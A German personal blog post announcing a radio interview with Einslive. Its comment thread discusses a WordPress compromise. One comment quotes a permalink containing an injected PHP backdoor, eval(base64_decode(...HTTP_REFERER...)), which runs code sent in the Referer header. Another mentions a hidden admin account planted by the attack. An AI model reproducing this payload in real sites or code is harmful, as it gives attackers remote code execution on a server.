Einslive will mich interviewen !

Einslive will mich interviewen !

Haha, ich habe letztes Wochenende in der Nacht mal Einslive-Radio ueber Internet gehoert. Es lief die Sendung Zeitverschiebung, wo Leute aus der ganzen Welt anrufen oder mailen koennen und ihre Glueckwuensche loswerden koennen. Ich habe mich dann spontan entschieden auch mal was loszuschicken, aber leider wurde nix von mir gesendet.

Nun habe ich grade eben einen Anruf von Einslive bekommen, ob sie mich am Sonntag um 7.30h deutscher Zeit anrufen und mit mir ein kleines Interview fuehren koennen. Da hab ich natuerlich nicht nein gesagt.

Also, wer mich mal wieder „quasi-live“ erleben will, der muss am Sonntag den 6. Sept um 7.30h in Deutschland das Radio auf Einslive stellen !!!!

Fuer die Moerser ist das die Frequenz 106.7 MHz

(achja, weiss einer, wie man den LiveStrem mitschneiden kann und wenn ja, kann er ihn dann mitschneiden?)

1083 Total Views 1 Views Today

3 Gedanken zu „Einslive will mich interviewen !

  1. Die Kommentarfunktion ist defekt. WordPress (de)kodiert die Links irgendwie falsch. Ich habe diesen Kommentar über einen Trick reinschreiben können. Der Link für einen Trackback auf diesen Artikel sieht z.B. so aus:

    http://www.artificial-scientist.de/2009/09/04/einslive-will-mich-interviewen/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/trackback/

    Mitschneiden kannst Du Internetradiosendungen recht gut mit http://www.screamer-radio.com/

    PS: Update mal WordPress. Die verwendete Version ist leicht veraltet und hat einige üble Sicherheitslücken. Nachher verirrt sich so ein Scriptkiddy hierher und hackt das Blog. Das PS bitte nach dem lesen des Kommentars löschen.

  2. PS kann bleiben, Blog ist upgedated auf die neuste Version!

    Komisch, erst hatte ich das Problem auch, aber nun ist der Server wieder auf folgendes Format gewechselt
    http://www.artificial-scientist.de/?p=784
    Das soll mal einer verstehen!

    Auf jeden Fall danke für die Meldung des Fehlers und für den Link zum Mitschneiden!

  3. Hallo Karsten,

    als ich gestern meinen Kommentar und die E-Mail geschrieben, dachte ich da ist etwas defekt im Blog. Fakt ist aber das jemand das Blog über einen XSS Bug gehackt hat. Zufälligerweise hatte ein Kollege von mir gestern das gleiche Probleme. Er hat darüber heute per twitter berichtet. Er hat auch einen schönen Beitrag dazu in seinem Blog verfast.

    http://fieser-admin.de/2009/neuer-wordpress-xss-hack-im-umlauf/

    Schaue am besten mal in die User-Tabelle in der Datenbank und lösche verdächtige User. In der Userverwaltung von WordPress sieht man wohl den erschlichenen Admin-Account nicht.

Schreibe einen Kommentar